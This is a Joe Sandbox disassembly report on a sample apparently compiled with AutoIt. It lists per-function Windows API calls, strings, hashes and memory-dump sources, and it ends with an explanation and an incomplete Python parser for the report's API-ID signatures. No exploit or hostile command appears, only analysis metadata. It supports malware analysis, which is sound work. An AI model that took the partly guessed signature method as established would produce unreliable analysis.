                                                        • SetTimer.USER32(00000000,00000000,00000028,007C1256), ref: 007C29FC
                                                        Strings
                                                        Similarity
                                                        • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                        • String ID: AutoIt v3 GUI
                                                        • API String ID: 1458621304-248962490
                                                        APIs
                                                        Strings
                                                        Similarity
                                                        • API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
                                                        • String ID: {n~${n~
                                                        • API String ID: 884005220-1009307361
                                                        APIs
                                                        • GetClassNameW.USER32(?,?,00000100), ref: 0081A47A
                                                        • __swprintf.LIBCMT ref: 0081A51B
                                                        • _wcscmp.LIBCMT ref: 0081A52E
                                                        • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0081A583
                                                        • _wcscmp.LIBCMT ref: 0081A5BF
                                                        • GetClassNameW.USER32(?,?,00000400), ref: 0081A5F6
                                                        • GetDlgCtrlID.USER32(?), ref: 0081A648
                                                        • GetWindowRect.USER32(?,?), ref: 0081A67E
                                                        • GetParent.USER32(?), ref: 0081A69C
                                                        • ScreenToClient.USER32(00000000), ref: 0081A6A3
                                                        • GetClassNameW.USER32(?,?,00000100), ref: 0081A71D
                                                        • _wcscmp.LIBCMT ref: 0081A731
                                                        • GetWindowTextW.USER32(?,?,00000400), ref: 0081A757
                                                        • _wcscmp.LIBCMT ref: 0081A76B
                                                          • Part of subcall function 007E362C: _iswctype.LIBCMT ref: 007E3634
                                                        Strings
                                                        Similarity
                                                        • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_iswctype
                                                        • String ID: %s%u
                                                        • API String ID: 3744389584-679674701
                                                        APIs
                                                        • GetClassNameW.USER32(00000008,?,00000400), ref: 0081AF18
                                                        • _wcscmp.LIBCMT ref: 0081AF29
                                                        • GetWindowTextW.USER32(00000001,?,00000400), ref: 0081AF51
                                                        • CharUpperBuffW.USER32(?,00000000), ref: 0081AF6E
                                                        • _wcscmp.LIBCMT ref: 0081AF8C
                                                        • _wcsstr.LIBCMT ref: 0081AF9D
                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 0081AFD5
                                                        • _wcscmp.LIBCMT ref: 0081AFE5
                                                        • GetWindowTextW.USER32(00000002,?,00000400), ref: 0081B00C
                                                        • GetClassNameW.USER32(00000018,?,00000400), ref: 0081B055
                                                        • _wcscmp.LIBCMT ref: 0081B065
                                                        • GetClassNameW.USER32(00000010,?,00000400), ref: 0081B08D
                                                        • GetWindowRect.USER32(00000004,?), ref: 0081B0F6
                                                        Strings
                                                        Similarity
                                                        • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                        • String ID: @$ThumbnailClass
                                                        • API String ID: 1788623398-1539354611
                                                        APIs
                                                        • _memset.LIBCMT ref: 0084A259
                                                        • DestroyWindow.USER32(?,?), ref: 0084A2D3
                                                          • Part of subcall function 007C7BCC: _memmove.LIBCMT ref: 007C7C06
                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 0084A34D
                                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 0084A36F
                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0084A382
                                                        • DestroyWindow.USER32(00000000), ref: 0084A3A4
                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,007C0000,00000000), ref: 0084A3DB
                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 0084A3F4
                                                        • GetDesktopWindow.USER32 ref: 0084A40D
                                                        • GetWindowRect.USER32(00000000), ref: 0084A414
                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 0084A42C
                                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 0084A444
                                                          • Part of subcall function 007C25DB: GetWindowLongW.USER32(?,000000EB), ref: 007C25EC
                                                        Strings
                                                        Similarity
                                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                        • String ID: 0$0R$tooltips_class32
                                                        • API String ID: 1297703922-1664022856
                                                        APIs
                                                          • Part of subcall function 007C2612: GetWindowLongW.USER32(?,000000EB), ref: 007C2623
                                                        • DragQueryPoint.SHELL32(?,?), ref: 0084C627
                                                          • Part of subcall function 0084AB37: ClientToScreen.USER32(?,?), ref: 0084AB60
                                                          • Part of subcall function 0084AB37: GetWindowRect.USER32(?,?), ref: 0084ABD6
                                                          • Part of subcall function 0084AB37: PtInRect.USER32(?,?,0084C014), ref: 0084ABE6
                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0084C690
                                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 0084C69B
                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 0084C6BE
                                                        • _wcscat.LIBCMT ref: 0084C6EE
                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0084C705
                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 0084C71E
                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0084C735
                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 0084C757
                                                        • DragFinish.SHELL32(?), ref: 0084C75E
                                                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 0084C851
                                                        Strings
                                                        Similarity
                                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                        • String ID: 0R$@GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                        • API String ID: 169749273-1450502738
                                                        APIs
                                                        Strings
                                                        Similarity
                                                        • API ID: __wcsnicmp
                                                        • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                        • API String ID: 1038674560-1810252412
                                                        APIs
                                                        • LoadCursorW.USER32(00000000,00007F8A), ref: 00835013
                                                        • LoadCursorW.USER32(00000000,00007F00), ref: 0083501E
                                                        • LoadCursorW.USER32(00000000,00007F03), ref: 00835029
                                                        • LoadCursorW.USER32(00000000,00007F8B), ref: 00835034
                                                        • LoadCursorW.USER32(00000000,00007F01), ref: 0083503F
                                                        • LoadCursorW.USER32(00000000,00007F81), ref: 0083504A
                                                        • LoadCursorW.USER32(00000000,00007F88), ref: 00835055
                                                        • LoadCursorW.USER32(00000000,00007F80), ref: 00835060
                                                        • LoadCursorW.USER32(00000000,00007F86), ref: 0083506B
                                                        • LoadCursorW.USER32(00000000,00007F83), ref: 00835076
                                                        • LoadCursorW.USER32(00000000,00007F85), ref: 00835081
                                                        • LoadCursorW.USER32(00000000,00007F82), ref: 0083508C
                                                        • LoadCursorW.USER32(00000000,00007F84), ref: 00835097
                                                        • LoadCursorW.USER32(00000000,00007F04), ref: 008350A2
                                                        • LoadCursorW.USER32(00000000,00007F02), ref: 008350AD
                                                        • LoadCursorW.USER32(00000000,00007F89), ref: 008350B8
                                                        • GetCursorInfo.USER32(?), ref: 008350C8
                                                        Similarity
                                                        • API ID: Cursor$Load$Info
                                                        • String ID:
                                                        • API String ID: 2577412497-0
                                                        APIs
                                                        • CharUpperBuffW.USER32(?,?), ref: 00844424
                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 0084446F
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: BuffCharMessageSendUpper
                                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                        • API String ID: 3974292440-4258414348
                                                        • Opcode ID: 1996447a9d608aaaf4ed76124227db2449cc79e6716659c61f4b773072fe6928
                                                        • Instruction ID: 6d9e78847c9c2f88f9d9a65f1133ff4d768c288b82ce9477c6199cf1abfab846
                                                        • Opcode Fuzzy Hash: 1996447a9d608aaaf4ed76124227db2449cc79e6716659c61f4b773072fe6928
                                                        • Instruction Fuzzy Hash: F19179302007049BCB04EF24C459B6EB7E1FF95354F05886CE9969B3A2CB34ED8ACB81
                                                        APIs
                                                          • Part of subcall function 007C2612: GetWindowLongW.USER32(?,000000EB), ref: 007C2623
                                                        • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 0084C1FC
                                                        • GetFocus.USER32 ref: 0084C20C
                                                        • GetDlgCtrlID.USER32(00000000), ref: 0084C217
                                                        • _memset.LIBCMT ref: 0084C342
                                                        • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 0084C36D
                                                        • GetMenuItemCount.USER32(?), ref: 0084C38D
                                                        • GetMenuItemID.USER32(?,00000000), ref: 0084C3A0
                                                        • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 0084C3D4
                                                        • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 0084C41C
                                                        • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 0084C454
                                                        • DefDlgProcW.USER32(?,00000111,?,?,?,?,?,?,?), ref: 0084C489
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ItemMenu$Info$CheckCountCtrlFocusLongMessagePostProcRadioWindow_memset
                                                        • String ID: 0$0R
                                                        • API String ID: 1296962147-488941688
                                                        • Opcode ID: d5c9ddc5d9f99481c6b0888fe0c3161ba07f0c630ed12767d71555e1beaf3953
                                                        • Instruction ID: 4c3287f30eb94f1c3aa99fd42dff62aabd32d9af370bce6b6ec1c8d7bef8f737
                                                        • Opcode Fuzzy Hash: d5c9ddc5d9f99481c6b0888fe0c3161ba07f0c630ed12767d71555e1beaf3953
                                                        • Instruction Fuzzy Hash: 4A81BF7020A319AFD750DF14C984A7BBBE8FB88314F00492EFA95D7292D770D905CBA2
                                                        APIs
                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 0084B8B4
                                                        • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,00846B11,?), ref: 0084B910
                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0084B949
                                                        • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 0084B98C
                                                        • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 0084B9C3
                                                        • FreeLibrary.KERNEL32(?), ref: 0084B9CF
                                                        • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0084B9DF
                                                        • DestroyIcon.USER32(?), ref: 0084B9EE
                                                        • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 0084BA0B
                                                        • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 0084BA17
                                                          • Part of subcall function 007E2EFD: __wcsicmp_l.LIBCMT ref: 007E2F86
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Load$Image$IconLibraryMessageSend$DestroyExtractFree__wcsicmp_l
                                                        • String ID: .dll$.exe$.icl
                                                        • API String ID: 1212759294-1154884017
                                                        • Opcode ID: 5df2ba8816b25270d74dcedaf7942b93d07688ac5ad1a745d8f37ab2b55f16d4
                                                        • Instruction ID: 9f30bdd5fa0bf8123a5f179ab0c42bb8a0fecff86fcb3cfda48b02d0cb0b7c93
                                                        • Opcode Fuzzy Hash: 5df2ba8816b25270d74dcedaf7942b93d07688ac5ad1a745d8f37ab2b55f16d4
                                                        • Instruction Fuzzy Hash: E961BD71940219BAEB14DF64CC45FBA7BACFB08720F104119FA15D61D2EB78D991DBA0
                                                        APIs
                                                        • GetLocalTime.KERNEL32(?), ref: 0082DCDC
                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 0082DCEC
                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 0082DCF8
                                                        • __wsplitpath.LIBCMT ref: 0082DD56
                                                        • _wcscat.LIBCMT ref: 0082DD6E
                                                        • _wcscat.LIBCMT ref: 0082DD80
                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 0082DD95
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0082DDA9
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0082DDDB
                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 0082DDFC
                                                        • _wcscpy.LIBCMT ref: 0082DE08
                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 0082DE47
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                        • String ID: *.*
                                                        • API String ID: 3566783562-438819550
                                                        • Opcode ID: 9839ec46b76dd821f91a09838b2932526ce6a62ec259878dd9cf7541e019a137
                                                        • Instruction ID: 77cc04db575fa4c615cb9942975e5fc6f1c821aa100a65044f03265eba3a42df
                                                        • Opcode Fuzzy Hash: 9839ec46b76dd821f91a09838b2932526ce6a62ec259878dd9cf7541e019a137
                                                        • Instruction Fuzzy Hash: F86169765043559FCB10EF20D848EAEB7E8FF89314F04892DEA89C7251DB35E985CB92
                                                        APIs
                                                          • Part of subcall function 007C1B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,007C2036,?,00000000,?,?,?,?,007C16CB,00000000,?), ref: 007C1B9A
                                                        • DestroyWindow.USER32(?,?,?,?,?,?,?,?,?,?,?,00000000,?,?), ref: 007C20D3
                                                        • KillTimer.USER32(-00000001,?,?,?,?,007C16CB,00000000,?,?,007C1AE2,?,?), ref: 007C216E
                                                        • DestroyAcceleratorTable.USER32(00000000), ref: 007FBCA6
                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007C16CB,00000000,?,?,007C1AE2,?,?), ref: 007FBCD7
                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007C16CB,00000000,?,?,007C1AE2,?,?), ref: 007FBCEE
                                                        • ImageList_Destroy.COMCTL32(00000000,?,00000000,?,?,?,?,007C16CB,00000000,?,?,007C1AE2,?,?), ref: 007FBD0A
                                                        • DeleteObject.GDI32(00000000), ref: 007FBD1C
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                        • String ID: 0R
                                                        • API String ID: 641708696-1916035689
                                                        • Opcode ID: dcdaf1305b62c9cc9f5bae78e376a37a7824d619c3aaf6affb846d75c86ad086
                                                        • Instruction ID: c21a9bc563ae6b01693cf3e240f91827c7ed8136367adf0d5be00591f8f11621
                                                        • Opcode Fuzzy Hash: dcdaf1305b62c9cc9f5bae78e376a37a7824d619c3aaf6affb846d75c86ad086
                                                        • Instruction Fuzzy Hash: 44619035210A04DFDB35AF18D948B3A77F1FF41312F54852EE6428A672C778A892DF51
                                                        APIs
                                                          • Part of subcall function 007C9837: __itow.LIBCMT ref: 007C9862
                                                          • Part of subcall function 007C9837: __swprintf.LIBCMT ref: 007C98AC
                                                        • CharLowerBuffW.USER32(?,?), ref: 0082A3CB
                                                        • GetDriveTypeW.KERNEL32 ref: 0082A418
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0082A460
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0082A497
                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0082A4C5
                                                          • Part of subcall function 007C7BCC: _memmove.LIBCMT ref: 007C7C06
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                        • API String ID: 2698844021-4113822522
                                                        • Opcode ID: 896769efe92ab0a50e9d7d90c61ef01cf52242c741abc8bb2fdb6931a680bcca
                                                        • Instruction ID: cdbc6019819a8b75f3de911fe061fbb81f6bf23f24857cd5513e246938d1c5af
                                                        • Opcode Fuzzy Hash: 896769efe92ab0a50e9d7d90c61ef01cf52242c741abc8bb2fdb6931a680bcca
                                                        • Instruction Fuzzy Hash: E4513A71104205DFC704EF10C889E6AB7E4FF98718F00886DF89A97261DB75ED4ACB92
                                                        APIs
                                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,007FE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 0081F8DF
                                                        • LoadStringW.USER32(00000000,?,007FE029,00000001), ref: 0081F8E8
                                                          • Part of subcall function 007C7DE1: _memmove.LIBCMT ref: 007C7E22
                                                        • GetModuleHandleW.KERNEL32(00000000,00885310,?,00000FFF,?,?,007FE029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 0081F90A
                                                        • LoadStringW.USER32(00000000,?,007FE029,00000001), ref: 0081F90D
                                                        • __swprintf.LIBCMT ref: 0081F95D
                                                        • __swprintf.LIBCMT ref: 0081F96E
                                                        • _wprintf.LIBCMT ref: 0081FA17
                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0081FA2E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                        • API String ID: 984253442-2268648507
                                                        • Opcode ID: 303ed97bc0687277ec4309387d19f1ad76e2032487336abdd60c0eefad3478cf
                                                        • Instruction ID: 430c7633eb664eeb8756ac8b44cf19decf6973719a04398fe8280a1f55b4ebc9
                                                        • Opcode Fuzzy Hash: 303ed97bc0687277ec4309387d19f1ad76e2032487336abdd60c0eefad3478cf
                                                        • Instruction Fuzzy Hash: E3413E72904119EACB14FBE4DD4AEEE777CEF18310F500069B605B2092EE396F49CB61
                                                        APIs
                                                          • Part of subcall function 007C25DB: GetWindowLongW.USER32(?,000000EB), ref: 007C25EC
                                                        • GetSysColor.USER32(0000000F), ref: 007C21D3
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: ColorLongWindow
                                                        • String ID: 0R
                                                        • API String ID: 259745315-1916035689
                                                        • Opcode ID: c946608561e653c3e68125a4553786c28878b0e4945e27f60cb616ac7b87a419
                                                        • Instruction ID: 5208fbaac001190be88a16bd95165f079261f8b3b46de024f5e77b079c322dd6
                                                        • Opcode Fuzzy Hash: c946608561e653c3e68125a4553786c28878b0e4945e27f60cb616ac7b87a419
                                                        • Instruction Fuzzy Hash: 70416D35100544DADB259F28EC88FB93B65FB06331F1A426DFE658A1E7D7358C42DB21
                                                        APIs
                                                        • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 0084BA56
                                                        • GetFileSize.KERNEL32(00000000,00000000), ref: 0084BA6D
                                                        • GlobalAlloc.KERNEL32(00000002,00000000), ref: 0084BA78
                                                        • CloseHandle.KERNEL32(00000000), ref: 0084BA85
                                                        • GlobalLock.KERNEL32(00000000), ref: 0084BA8E
                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0084BA9D
                                                        • GlobalUnlock.KERNEL32(00000000), ref: 0084BAA6
                                                        • CloseHandle.KERNEL32(00000000), ref: 0084BAAD
                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0084BABE
                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,00852CAC,?), ref: 0084BAD7
                                                        • GlobalFree.KERNEL32(00000000), ref: 0084BAE7
                                                        • GetObjectW.GDI32(?,00000018,000000FF), ref: 0084BB0B
                                                        • CopyImage.USER32(?,00000000,?,?,00002000), ref: 0084BB36
                                                        • DeleteObject.GDI32(00000000), ref: 0084BB5E
                                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 0084BB74
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.1668117068.00000000007C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 007C0000, based on PE: true
                                                        • Associated: 00000000.00000002.1668106518.00000000007C0000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.000000000084F000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668153652.0000000000874000.00000002.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668184050.000000000087E000.00000004.00000001.01000000.00000003.sdmp
                                                        • Associated: 00000000.00000002.1668196241.0000000000887000.00000002.00000001.01000000.00000003.sdmp
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7c0000_YH-3-12-2024-GDL Units - Projects.jbxd
                                                        Similarity
                                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                        • String ID:
                                                        • API String ID: 3840717409-0
                                                        • Opcode ID: d7522796b69a4e8511fe7732fbe2af49ac424b773a7baa1f6dedc94695401771
                                                        • Instruction ID: f91401d94f27a6f8d846cf022090b7957d05dc84a3dea88a357e4490d1eb7641
                                                        • Opcode Fuzzy Hash: d7522796b69a4e8511fe7732fbe2af49ac424b773a7baa1f6dedc94695401771
                                                        • Instruction Fuzzy Hash: 82412979601218EFDB11DF65DC88EABBBB8FB8A721F104068FA09D7261D7709D01DB60
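The "API ID" printed under each function's Similarity block is a frequency-ranked signature built from the words of the API names the function calls, and it is what lets functions be matched across samples: the two directory routines at 0082DCDC and 0082DA10 both carry "CurrentDirectory" and "_wcscat" groups, for example. The Python below is an added example and not Joe Sandbox code. It parses the "APIs" listings exactly as they are printed on this page into structured call records (API, module, arguments, call-site address, subcall flag) and reconstructs the API ID by a rule guessed from the listed name/ID pairs: split CamelCase, drop a small set of words the report visibly omits (Get, Set, W, Ex and similar), then group by count. The tokeniser and the STOPWORDS set are assumptions fitted to the functions shown here; they are checked only against the two listings embedded in the sample and are known not to reproduce every token the report emits (the "ImageList_" token, for instance).

```python
"""Parse the per-function "APIs" listings of a Joe Sandbox disassembly report and
rebuild the frequency-ranked "API ID" key printed under "Similarity".

Added example, not Joe Sandbox code. TOKEN_RE and STOPWORDS are a guess fitted to
the functions on this page, not a published algorithm, and they do not reproduce
every token the report emits (e.g. "ImageList_").
"""
import re
from collections import Counter
from dataclasses import dataclass

# Constructed sample: two listings copied from the report (the picture loader at
# 0084BA56.. and the directory/timestamp routine at 0082DCDC..).
SAMPLE = """\
APIs
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 0084BA56
• GetFileSize.KERNEL32(00000000,00000000), ref: 0084BA6D
• GlobalAlloc.KERNEL32(00000002,00000000), ref: 0084BA78
• CloseHandle.KERNEL32(00000000), ref: 0084BA85
• GlobalLock.KERNEL32(00000000), ref: 0084BA8E
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 0084BA9D
• GlobalUnlock.KERNEL32(00000000), ref: 0084BAA6
• CloseHandle.KERNEL32(00000000), ref: 0084BAAD
• CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 0084BABE
• OleLoadPicture.OLEAUT32(?,00000000,00000000,00852CAC,?), ref: 0084BAD7
• GlobalFree.KERNEL32(00000000), ref: 0084BAE7
• GetObjectW.GDI32(?,00000018,000000FF), ref: 0084BB0B
• CopyImage.USER32(?,00000000,?,?,00002000), ref: 0084BB36
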